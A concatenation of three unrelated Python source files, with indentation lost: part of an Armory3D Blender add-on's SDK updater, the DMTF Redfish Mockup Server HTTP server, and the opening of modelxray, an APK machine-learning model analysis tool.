bl_label = "Update SDK"
bl_description = "Update to the latest development version"
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
self.report({'INFO'}, 'Updating Armory SDK, check console for details.')
print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories')
os.chdir(sdk_path)
global repos_updated
global repos_total
repos_updated = 0
repos_total = 9
def done():
global repos_updated
global repos_total
repos_updated += 1
if repos_updated == repos_total:
print('Armory SDK updated, please restart Blender')
git_clone(done, sdk_path, 'armory3d/armory', 'armory')
git_clone(done, sdk_path, 'armory3d/iron', 'iron')
git_clone(done, sdk_path, 'armory3d/haxebullet', 'lib/haxebullet')
git_clone(done, sdk_path, 'armory3d/haxerecast', 'lib/haxerecast')
git_clone(done, sdk_path, 'armory3d/zui', 'lib/zui')
git_clone(done, sdk_path, 'armory3d/armory_tools', 'lib/armory_tools')
git_clone(done, sdk_path, 'armory3d/iron_format', 'lib/iron_format')
git_clone(done, sdk_path, 'armory3d/Krom_bin', 'Krom')
git_clone(done, sdk_path, 'armory3d/Kha', 'Kha', recursive=True)
return {"FINISHED"}
class ArmAddonRestoreButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.restore"
bl_label = "Restore SDK"
bl_description = "Restore stable version"
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
os.chdir(sdk_path)
restore_repo(sdk_path, 'armory')
restore_repo(sdk_path, 'iron')
restore_repo(sdk_path, 'lib/haxebullet')
restore_repo(sdk_path, 'lib/haxerecast')
restore_repo(sdk_path, 'lib/zui')
restore_repo(sdk_path, 'lib/armory_tools')
restore_repo(sdk_path, 'lib/iron_format')
restore_repo(sdk_path, 'Kha')
restore_repo(sdk_path, 'Krom')
self.report({'INFO'}, 'Restored stable version')
return {"FINISHED"}
class ArmAddonHelpButton(bpy.types.Operator):
'''Updater help'''
bl_idname = "arm_addon.help"
bl_label = "Help"
bl_description = "Git is required for Armory Updater to work"
def execute(self, context):
webbrowser.open('https://armory3d.org/manual/#/dev/gitversion')
return {"FINISHED"}
@persistent
def on_load_post(context):
if ArmAddonStartButton.running:
return
bpy.ops.arm_addon.start()
def register():
bpy.utils.register_class(ArmoryAddonPreferences)
bpy.utils.register_class(ArmAddonStartButton)
bpy.utils.register_class(ArmAddonStopButton)
bpy.utils.register_class(ArmAddonUpdateButton)
bpy.utils.register_class(ArmAddonRestoreButton)
bpy.utils.register_class(ArmAddonHelpButton)
bpy.app.handlers.load_post.append(on_load_post)
def unregister():
bpy.ops.arm_addon.stop()
bpy.utils.unregister_class(ArmoryAddonPreferences)
bpy.utils.unregister_class(ArmAddonStartButton)
bpy.utils.unregister_class(ArmAddonStopButton)
bpy.utils.unregister_class(ArmAddonUpdateButton)
bpy.utils.unregister_class(ArmAddonRestoreButton)
bpy.utils.unregister_class(ArmAddonHelpButton)
bpy.app.handlers.load_post.remove(on_load_post)
if __name__ == "__main__":
register()
|
redfishMockupServer.py
|
# Copyright Notice:
# Copyright 2016-2019 DMTF. All rights reserved.
# License: BSD 3-Clause License. For full text see link: https://github.com/DMTF/Redfish-Mockup-Server/blob/master/LICENSE.md
# redfishMockupServer.py
# tested and developed on Python 3.4
import sys
import argparse
import time
import collections.abc
import json
import threading
import datetime
import grequests
import os
import ssl
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, urlunparse, parse_qs
from rfSsdpServer import RfSDDPServer
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
logger.addHandler(ch)
tool_version = "1.0.8"
dont_send = ["connection", "keep-alive", "content-length", "transfer-encoding"]
def dict_merge(dct, merge_dct):
"""
https://gist.github.com/angstwad/bf22d1822c38a92ec0a9 modified
Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
updating only top-level keys, dict_merge recurses down into dicts nested
to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k in merge_dct:
if (k in dct and isinstance(dct[k], dict) and isinstance(merge_dct[k], collections.abc.Mapping)):
dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
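# Illustrative example (not from the original source):
#   dst = {'a': 1, 'b': {'x': 1}}
#   dict_merge(dst, {'b': {'y': 2}, 'c': 3})
#   # dst is now {'a': 1, 'b': {'x': 1, 'y': 2}, 'c': 3}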
def clean_path(path, isShort):
"""clean_path
:param path:
:param isShort:
"""
path = path.strip('/')
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
if isShort:
path = path.replace('redfish/v1', '').strip('/')
return path
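# Illustrative examples:
#   clean_path('/redfish/v1/Systems/1?$top=5', False) -> 'redfish/v1/Systems/1'
#   clean_path('/redfish/v1/Systems/1?$top=5', True)  -> 'Systems/1'  (short form)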
class RfMockupServer(BaseHTTPRequestHandler):
'''
returns the index.json file for the specified URL
'''
patchedLinks = dict()
def construct_path(self, path, filename):
"""construct_path
:param path:
:param filename:
"""
apath = self.server.mockDir
rpath = clean_path(path, self.server.shortForm)
return '/'.join([ apath, rpath, filename ]) if filename not in ['', None] else '/'.join([ apath, rpath ])
def get_cached_link(self, path):
"""get_cached_link
:param path:
"""
if path not in self.patchedLinks:
if os.path.isfile(path):
with open(path) as f:
jsonData = json.load(f)
f.close()
else:
jsonData = None
else:
jsonData = self.patchedLinks[path]
return jsonData is not None and jsonData != '404', jsonData
def try_to_sleep(self, method, path):
"""try_to_sleep
:param method:
:param path:
"""
if self.server.timefromJson:
responseTime = self.getResponseTime(method, path)
try:
time.sleep(float(responseTime))
except ValueError as e:
logger.info("Time is not a float value. Sleeping with default response time")
time.sleep(float(self.server.responseTime))
else:
time.sleep(float(self.server.responseTime))
def send_header_file(self, fpath):
"""send_header_file
:param fpath:
"""
with open(fpath) as headers_data:
d = json.load(headers_data)
if isinstance(d.get("GET"), dict):
for k, v in d["GET"].items():
if k.lower() not in dont_send:
self.send_header(k, v)
def add_new_member(self, payload, data_received):
members = payload.get('Members')
n = 1
newpath_id = data_received.get('Id', 'Member')
newpath = '/'.join([ self.path, newpath_id ])
while newpath in [m.get('@odata.id') for m in members]:
n = n + 1
newpath_id = data_received.get('Id', 'Member') + str(n)
newpath = '/'.join([ self.path, newpath_id ])
members.append({'@odata.id': newpath})
payload['Members'] = members
payload['Members@odata.count'] = len(members)
return newpath
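# Illustrative example: POSTing {'Id': 'Session'} to the collection at
# /redfish/v1/SessionService/Sessions yields the new member path
# '/redfish/v1/SessionService/Sessions/Session', or '.../Session2',
# '.../Session3', ... if that @odata.id is already present in Members.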
def handle_eventing(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if ( ('EventType' not in data_received) or ('EventId' not in data_received) or
('EventTimestamp' not in data_received) or ('Severity' not in data_received) or
('Message' not in data_received) or ('MessageId' not in data_received) or
('MessageArgs' not in data_received) or ('OriginOfCondition' not in data_received) ):
return (400)
else:
# Need to reformat to make Origin Of Condition a proper link
origin_of_cond = data_received['OriginOfCondition']
data_received['OriginOfCondition'] = {}
data_received['OriginOfCondition']['@odata.id'] = origin_of_cond
event_payload = {}
event_payload['@odata.type'] = '#Event.v1_2_1.Event'
event_payload['Name'] = 'Test Event'
event_payload['Id'] = str(self.event_id)
event_payload['Events'] = []
event_payload['Events'].append(data_received)
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
logger.info((data_received['EventType'], subscription['EventTypes']))
# If the EventType in the request is one of interest to the subscriber, build an event payload
if data_received['EventType'] in subscription['EventTypes']:
http_headers = {}
http_headers['Content-Type'] = 'application/json'
event_payload['Context'] = subscription.get('Context', 'Default Context')
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
self.event_id = self.event_id + 1
return (204)
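# Illustrative SubmitTestEvent request body (hypothetical values) that passes
# the parameter check in handle_eventing above and is forwarded to subscribers
# whose EventTypes include "Alert":
#   {
#       "EventType": "Alert", "EventId": "1", "Severity": "Warning",
#       "EventTimestamp": "2019-01-01T00:00:00Z", "Message": "Test event",
#       "MessageId": "Alert.1.0.Test", "MessageArgs": [],
#       "OriginOfCondition": "/redfish/v1/Systems/1"
#   }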
def handle_telemetry(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if (('MetricReportName' in data_received) and ('MetricReportValues' in data_received)) or\
(('MetricReportName' in data_received) and ('GeneratedMetricReportValues' in data_received)) or\
(('MetricName' in data_received) and ('MetricValues' in data_received)):
# If the EventType in the request is one of interest to the subscriber, build an event payload
expected_keys = ['MetricId', 'MetricValue', 'Timestamp', 'MetricProperty', 'MetricDefinition']
other_keys = ['MetricProperty']
my_name = data_received.get('MetricName',
data_received.get('MetricReportName'))
my_data = data_received.get('MetricValues',
data_received.get('MetricReportValues',
data_received.get('GeneratedMetricReportValues')))
event_payload = {}
value_list = []
# event_payload['@Redfish.Copyright'] = 'Copyright 2014-2016 Distributed Management Task Force, Inc. (DMTF). All rights reserved.'
event_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReport.MetricReport'
event_payload['@odata.type'] = '#MetricReport.v1_0_0.MetricReport'
event_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports/' + my_name
event_payload['Id'] = my_name
event_payload['Name'] = my_name
event_payload['MetricReportDefinition'] = {
"@odata.id": "/redfish/v1/TelemetryService/MetricReportDefinitions/" + my_name}
now = datetime.datetime.now()
event_payload['Timestamp'] = now.strftime('%Y-%m-%dT%H:%M:%S') + ('-%02d' % (now.microsecond / 10000))
for tup in my_data:
if all(x in tup for x in expected_keys):
# uncomment for stricter payload check
# ex: if all(x in expected_keys + other_keys for x in tup):
value_list.append(tup)
event_payload['MetricValues'] = value_list
logger.info(event_payload)
# construct path "mockdir/path/to/resource/<filename>"
event_fpath = self.construct_path(event_payload['@odata.id'], 'index.json')
self.patchedLinks[event_fpath] = event_payload
report_path = '/redfish/v1/TelemetryService/MetricReports'
report_path = self.construct_path(report_path, 'index.json')
success, collection_payload = self.get_cached_link(report_path)
if not success:
collection_payload = {'Members': []}
collection_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReportCollection.MetricReportCollection'
collection_payload['@odata.type'] = '#MetricReportCollection.v1_0_0.MetricReportCollection'
collection_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports'
collection_payload['Name'] = 'MetricReports'
if event_payload['@odata.id'] not in [member.get('@odata.id') for member in collection_payload['Members']]:
collection_payload['Members'].append({'@odata.id': event_payload['@odata.id']})
collection_payload['Members@odata.count'] = len(collection_payload['Members'])
self.patchedLinks[report_path] = collection_payload
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
http_headers = {}
http_headers['Content-Type'] = 'application/json'
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
self.event_id = self.event_id + 1
return (204)
else:
return (400)
server_version = "RedfishMockupHTTPD_v" + tool_version
event_id = 1
def get_payload(self, path):
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(path, 'index.json')
success, payload = self.get_cached_link(fpath)
if success:
# If data is wrapped in a "body" key, unwrap it
body = payload.get('Body')
if body is not None:
payload = body
else:
logger.info("ERROR: Unable to get payload for {}".format(path))
return success, payload
# Respond to CORS requests; allow everything
# https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
# https://www.html5rocks.com/static/images/cors_server_flowchart.png
def send_cors_headers(self):
# allow all CORS requests
self.send_header("Access-Control-Allow-Headers", "*")
self.send_header("Access-Control-Allow-Methods", "*")
self.send_header("Access-Control-Allow-Origin", "*")
# Headers only request
def do_HEAD(self):
"""do_HEAD"""
logger.info("Headers: ")
logger.info(self.server.headers)
# construct path "mockdir/path/to/resource/headers.json"
fpath = self.construct_path(self.path, 'index.json')
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
# If bool headers is true and headers.json exists...
# else, send normal headers for given resource
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_response(200)
self.send_header_file(fpath_headers)
elif (self.server.headers is False) or (os.path.isfile(fpath_headers) is False):
if self.get_cached_link(fpath)[0]:
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
elif os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
else:
self.send_response(404)
else:
self.send_response(404)
self.send_cors_headers()
self.end_headers()
# CORS OPTIONS requested by browser (a pre-flight request)
# https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
def do_OPTIONS(self):
"""do_OPTIONS"""
logger.info("Options: ")
logger.info(" OPTIONS: Headers: {}".format(self.headers))
self.send_response(200)
self.send_cors_headers()
self.end_headers()
def do_GET(self):
"""do_GET"""
# for GETs always dump the request headers to the console
# there is no request data, so no need to dump that
logger.info(("GET", self.path))
logger.info(" GET: Headers: {}".format(self.headers))
# construct path "mockdir/path/to/resource/<filename>"
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
success, payload = self.get_payload(self.path)
scheme, netloc, path, params, query, fragment = urlparse(self.path)
query_pieces = parse_qs(query, keep_blank_values=True)
self.try_to_sleep('GET', self.path)
# handle resource paths that don't exist for shortForm
# '/' and '/redfish'
if(self.path == '/' and self.server.shortForm):
self.send_response(404)
self.send_cors_headers()
self.end_headers()
elif(self.path in ['/redfish', '/redfish/'] and self.server.shortForm):
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.send_cors_headers()
self.end_headers()
self.wfile.write(json.dumps({'v1': '/redfish/v1'}, indent=4).encode())
# if this location exists in memory or as file
elif(success):
# if headers exist... send information (except for chunk info)
# end headers here (always end headers after response)
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.send_cors_headers()
self.end_headers()
# Strip the @Redfish.Copyright property
output_data = payload
output_data.pop("@Redfish.Copyright", None)
# Query evaluate
if output_data.get('Members') is not None:
my_members = output_data['Members']
top_count = int(query_pieces.get('$top', [str(len(my_members))])[0])
top_skip = int(query_pieces.get('$skip', ['0'])[0])
my_members = my_members[top_skip:]
if top_count < len(my_members):
my_members = my_members[:top_count]
query_out = {'$skip': top_skip + top_count, '$top': top_count}
query_string = '&'.join(['{}={}'.format(k, v) for k, v in query_out.items()])
output_data['Members@odata.nextLink'] = urlunparse(('', '', path, '', query_string, ''))
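# e.g. (illustrative): on a collection with 10 Members,
# GET /redfish/v1/Systems?$top=2&$skip=4 returns the 5th and 6th Members and a
# Members@odata.nextLink of '/redfish/v1/Systems?$skip=6&$top=2'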
else:
pass
# Query ?$expand=[.*~]
if query_pieces.get('$expand') is not None:
my_expanded_members = []
for member in my_members:
success, member_payload = self.get_payload(member['@odata.id'])
if success:
my_expanded_members.append(member_payload)
output_data['Members'] = my_expanded_members
# logger.info("*** EXPANDED OUTPUT: {}".format(output_data))
else:
output_data['Members'] = my_members
pass
encoded_data = json.dumps(output_data, sort_keys=True, indent=4, separators=(",", ": ")).encode()
self.wfile.write(encoded_data)
# if XML...
elif(os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct)):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
f = open(fpath_xml, "r")
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
f = open(fpath_direct, "r")
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
self.send_cors_headers()
self.end_headers()
self.wfile.write(f.read().encode())
f.close()
else:
self.send_response(404)
self.send_cors_headers()
self.end_headers()
def do_PATCH(self):
logger.info(" PATCH: Headers: {}".format(self.headers))
self.try_to_sleep('PATCH', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
if data_received:
logger.info(" PATCH: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# check if resource exists, otherwise 404
# if it's a file, open it; if it's in memory, grab it
# 405 if Collection
# 204 if patch success
# 404 if payload DNE
# 400 if no patch payload
# end headers
if success:
# If this is a collection, throw a 405
if payload.get('Members') is not None:
self.send_response(405)
else:
# After getting resource, merge the data.
logger.info(self.headers.get('content-type'))
logger.info(data_received)
logger.info(payload)
dict_merge(payload, data_received)
logger.info(payload)
# put into self.patchedLinks
self.patchedLinks[fpath] = payload
self.send_response(204)
else:
self.send_response(404)
else:
self.send_response(400)
self.send_cors_headers()
self.end_headers()
def do_PUT(self):
logger.info(" PUT: Headers: {}".format(self.headers))
self.try_to_sleep('PUT', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
logger.info(" PUT: Data: {}".format(data_received))
# we don't support this service
# 405
# end headers
self.send_response(405)
self.send_cors_headers()
self.end_headers()
def do_POST(self):
logger.info(" POST: Headers: {}".format(self.headers))
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 405')
data_received = None
self.try_to_sleep('POST', self.path)
if data_received:
logger.info(" POST: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# if the resource exists, treat this as a collection POST; otherwise check whether it's an action
# if file
# 405 if not Collection
# 204 if success
# 404 if no file present
if success:
if payload.get('Members') is None:
self.send_response(405)
else:
logger.info(data_received)
logger.info(type(data_received))
# with members, form unique ID
# must NOT exist in Members
# add ID to members, change count
# store as necessary in self.patchedLinks
newpath = self.add_new_member(payload, data_received)
newfpath = self.construct_path(newpath, 'index.json')
logger.info(newfpath)
self.patchedLinks[newfpath] = data_received
self.patchedLinks[fpath] = payload
self.send_response(204)
self.send_header("Location", newpath)
self.send_header("Content-Length", "0")
self.send_cors_headers()
self.end_headers()
# eventing framework
else:
if 'EventService/Actions/EventService.SubmitTestEvent' in self.path:
r_code = self.handle_eventing(data_received)
self.send_response(r_code)
elif 'TelemetryService/Actions/TelemetryService.SubmitTestMetricReport' in self.path:
r_code = self.handle_telemetry(data_received)
self.send_response(r_code)
else:
self.send_response(404)
else:
self.send_response(405)
self.send_cors_headers()
self.end_headers()
def do_DELETE(self):
"""
Delete a resource
"""
logger.info("DELETE: Headers: {}".format(self.headers))
self.try_to_sleep('DELETE', self.path)
fpath = self.construct_path(self.path, 'index.json')
ppath = '/'.join(self.path.split('/')[:-1])
parent_path = self.construct_path(ppath, 'index.json')
success, payload = self.get_cached_link(fpath)
# 404 if file doesn't exist
# 204 if success, override payload with 404
# modify payload to exclude expected URI, subtract count
# 405 if parent is not Collection
# end headers
if success:
success, parentData = self.get_cached_link(parent_path)
if success and parentData.get('Members') is not None:
self.patchedLinks[fpath] = '404'
parentData['Members'] = [x for x in parentData['Members'] if not x['@odata.id'] == self.path]
parentData['Members@odata.count'] = len(parentData['Members'])
self.patchedLinks[parent_path] = parentData
self.send_response(204)
else:
self.send_response(405)
else:
self.send_response(404)
self.send_cors_headers()
self.end_headers()
# Response time calculation Algorithm
def getResponseTime(self, method, path):
fpath = self.construct_path(path, 'time.json')
success, item = self.get_cached_link(path)
if not any(x in method for x in ("GET", "HEAD", "POST", "PATCH", "DELETE")):
logger.info("Not a valid method")
return (0)
if(os.path.isfile(fpath)):
with open(fpath) as time_data:
d = json.load(time_data)
time_str = method + "_Time"
if time_str in d:
try:
float(d[time_str])
except Exception as e:
logger.info(
"Time in the json file, not a float/int value. Reading the default time.")
return (self.server.responseTime)
return (float(d[time_str]))
else:
logger.info('response time: {}'.format(self.server.responseTime))
return (self.server.responseTime)
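# Illustrative sketch (an assumption, not a documented format beyond the keys
# read above): a time.json placed next to a resource's index.json could look
# like the JSON below, where each "<METHOD>_Time" value is the per-method
# response delay in seconds.
#
#   {
#       "GET_Time": 0.5,
#       "PATCH_Time": 1.0,
#       "DELETE_Time": 0.25
#   }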
def main():
logger.info("Redfish Mockup Server, version {}".format(tool_version))
parser = argparse.ArgumentParser(description='Serve a static Redfish mockup.')
parser.add_argument('-H', '--host', '--Host', default='127.0.0.1',
help='hostname or IP address (default 127.0.0.1)')
parser.add_argument('-p', '--port', '--Port', default=8000, type=int,
help='host port (default 8000)')
parser.add_argument('-D', '--dir', '--Dir',
help='path to mockup dir (may be relative to CWD)')
parser.add_argument('-E', '--test-etag', '--TestEtag',
action='store_true',
help='(unimplemented) etag testing')
parser.add_argument('-X', '--headers', action='store_true',
help='load headers from headers.json files in mockup')
parser.add_argument('-t', '--time', default=0,
help='delay in seconds added to responses (float or int)')
parser.add_argument('-T', action='store_true',
help='delay response based on times in time.json files in mockup')
parser.add_argument('-s', '--ssl', action='store_true',
help='place server in SSL (HTTPS) mode; requires a cert and key')
parser.add_argument('--cert', help='the certificate for SSL')
parser.add_argument('--key', help='the key for SSL')
parser.add_argument('-S', '--short-form', '--shortForm', action='store_true',
help='apply short form to mockup (omit filepath /redfish/v1)')
parser.add_argument('-P', '--ssdp', action='store_true',
help='make mockup SSDP discoverable')
args = parser.parse_args()
hostname = args.host
port = args.port
mockDirPath = args.dir
testEtagFlag = args.test_etag
headers = args.headers
responseTime = args.time
timefromJson = args.T
sslMode = args.ssl
sslCert = args.cert
sslKey = args.key
shortForm = args.short_form
ssdpStart = args.ssdp
logger.info('Hostname: {}'.format(hostname))
logger.info('Port: {}'.format(port))
logger.info("Mockup directory path specified: {}".format(mockDirPath))
logger.info("Response time: {} seconds".format(responseTime))
# check if mockup path was specified. If not, use current working directory
if mockDirPath is None:
mockDirPath = os.getcwd()
# create the full path to the top directory holding the Mockup
mockDir = os.path.realpath(mockDirPath)  # resolve the full absolute path of the mockup dir (relative paths are resolved against the CWD)
logger.info("Serving Mockup in absolute path: {}".format(mockDir))
# check that we have a valid tall mockup--with /redfish in mockDir before proceeding
if not shortForm:
slashRedfishDir = os.path.join(mockDir, "redfish")
if os.path.isdir(slashRedfishDir) is not True:
logger.info("ERROR: Invalid Mockup Directory--no /redfish directory at top. Aborting")
sys.stderr.flush()
sys.exit(1)
if shortForm:
if os.path.isdir(mockDir) is not True or os.path.isfile(os.path.join(mockDir, "index.json")) is not True:
logger.info("ERROR: Invalid Mockup Directory--dir or index.json does not exist")
sys.stderr.flush()
sys.exit(1)
myServer = HTTPServer((hostname, port), RfMockupServer)
if sslMode:
logger.info("Using SSL with certfile: {}".format(sslCert))
myServer.socket = ssl.wrap_socket(myServer.socket, certfile=sslCert, keyfile=sslKey, server_side=True)
# save the test flag, and real path to the mockup dir for the handler to use
myServer.mockDir = mockDir
myServer.testEtagFlag = testEtagFlag
myServer.headers = headers
myServer.timefromJson = timefromJson
myServer.shortForm = shortForm
try:
myServer.responseTime = float(responseTime)
except ValueError as e:
logger.info("Enter an integer or float value")
sys.exit(2)
# myServer.me="HELLO"
mySDDP = None
if ssdpStart:
from gevent import monkey
monkey.patch_all()
# construct path "mockdir/path/to/resource/<filename>"
path, filename, jsonData = '/redfish/v1', 'index.json', None
apath = myServer.mockDir
rpath = clean_path(path, myServer.shortForm)
fpath = os.path.join(apath, rpath, filename) if filename not in ['', None] else os.path.join(apath, rpath)
if os.path.isfile(fpath):
with open(fpath) as f:
jsonData = json.load(f)
else:
jsonData = None
protocol = '{}://'.format('https' if sslMode else 'http')
mySDDP = RfSDDPServer(jsonData, '{}{}:{}{}'.format(protocol, hostname, port, '/redfish/v1'), hostname)
logger.info("Serving Redfish mockup on port: {}".format(port))
try:
if mySDDP is not None:
t2 = threading.Thread(target=mySDDP.start)
t2.daemon = True
t2.start()
logger.info('running Server...')
myServer.serve_forever()
except KeyboardInterrupt:
pass
myServer.server_close()
logger.info("Shutting down http server")
# the below is only executed if the program is run as a script
if __name__ == "__main__":
main()
'''
TODO:
1. add -L option to load json and dump output from python dictionary
2. add authentication support -- note that in Redfish some APIs don't require auth
3. add https support
'''
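# A usage sketch (the script filename, port and the resource path
# /redfish/v1/Systems/1 are assumptions for illustration; the expected status
# codes follow the handlers above):
#
#   python redfishMockupServer.py -D ./mockup -p 8000
#
#   import requests
#   base = "http://127.0.0.1:8000"
#   requests.get(base + "/redfish/v1").status_code                      # 200, static mockup data
#   requests.patch(base + "/redfish/v1/Systems/1",
#                  json={"AssetTag": "demo"}).status_code               # 204, merged in memory
#   requests.put(base + "/redfish/v1/Systems/1").status_code            # 405, PUT is unsupported
#   requests.delete(base + "/redfish/v1/Systems/1").status_code         # 204, marked deleted in memory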
|
modelxray.py
|
#!/usr/bin/env python
import logging
import argparse
import ConfigParser
import os
import sys
import subprocess
import json
import time
from multiprocessing import Manager,Process
import progressbar
class ModelXRay:
"""
modelxray is a static Android APK analysis tool that extracts all
the useful information about the machine learning models used in an app.
"""
def __init__(self, apkpath, config, args):
if args.test_only is True:
return
self._apkpath = apkpath
self._config = config
self._args = args
self._outdir = config.get("config", "output_dir")
if self._args.decomposed_package is False:
self._decdir = config.get("config", "decomposed_dir")
self._pmodels = self._outdir + "/" + "models"
self._preports = self._outdir + "/" + "reports"
self._entropy_report = []
self._is_ml_app = False
self._skip = False
self._guess_fw = None
try:
self._magic_func_list = config.get("function_pattern","magic_str").split(',')
self._max_func_num = int(config.get("config","max_func_num"))
except:
self._magic_func_list = ['init','load','model','decrypt','start','create']
self._max_func_num = 50
# get free function pattern
try:
self._free_func_list = config.get("free_pattern","magic_str").split(',')
self._free_filter_list = config.get("free_pattern","filter_str").split(',')
except:
self._free_func_list = ['free']
self._free_filter_list = ['free_exception','free_dependent_exception']
logging.debug("apkpath:" + self._apkpath)
logging.debug("outdir :" + self._outdir)
if self._args.decomposed_package is False:
logging.debug("decdir :" + self._decdir)
logging.debug("reportsdir :" + self._preports)
logging.debug("modelsdir :" + self._pmodels)
if args.decomposed_package is False:
if args.package_name is True:
self._pkgname = self.get_package_name()
else:
self._pkgname = self.get_path_base()
self._decpath = os.path.abspath(apkpath)
else:
# apkpath may end with '/' when run with '-d'; if so, strip it before taking the basename
if apkpath.endswith('/'):
self._pkgname = os.path.basename(apkpath[:-1])
else:
self._pkgname = os.path.basename(apkpath)
self._respath = self._outdir + '/' + self._pkgname + '/'
self.setup_output_path()
self.setup_report()
self.setup_entropy_report()
pass
def get_path_base(self):
base = os.path.basename(self._apkpath)
if base.endswith('.apk'):
return base[:-4]
else:
return base
def setup_output_path(self):
# output dir
try:
os.stat(self._outdir)
except:
os.mkdir(self._outdir)
# decompose dir
if self._args.decomposed_package is False:
try:
os.stat(self._decdir)
except:
os.mkdir(self._decdir)
# reports dir
try:
os.stat(self._preports)
except:
os.mkdir(self._preports)
# models dir
try:
os.stat(self._pmodels)
except:
os.mkdir(self._pmodels)
def setup_entropy_report(self):
self._entropy_report_path = self._outdir + '/' + 'entropy_report'
if not os.path.exists(self._entropy_report_path):
shell_cmd = "echo 'entropy\tmd5\tsize\tpkgname\tfilename\tml_framework:library\t(entropy range(0,8), [>7.5] means random):' > %s" % self._entropy_report_path
self.run_wo(shell_cmd)
def setup_report(self):
repdir = self._outdir + '/' + self._pkgname
try:
os.stat(repdir)
except:
os.mkdir(repdir)
reppath = repdir+'/'+'report.md'
self._report = reppath
if not os.path.exists(reppath):
self._rh = open(reppath,'w')
else:
if self._args.regenerate_report is True:
logging.warning("overwriting existing report.md!")
self._skip = False
self._rh = open(reppath,'w')
else:
self._skip = True
return
self._rh.write("# Machine Learning Model Analysis Report for %s \n" % self._pkgname)
self._rh.write("\n source apk: %s \n" % self._apkpath)
pass
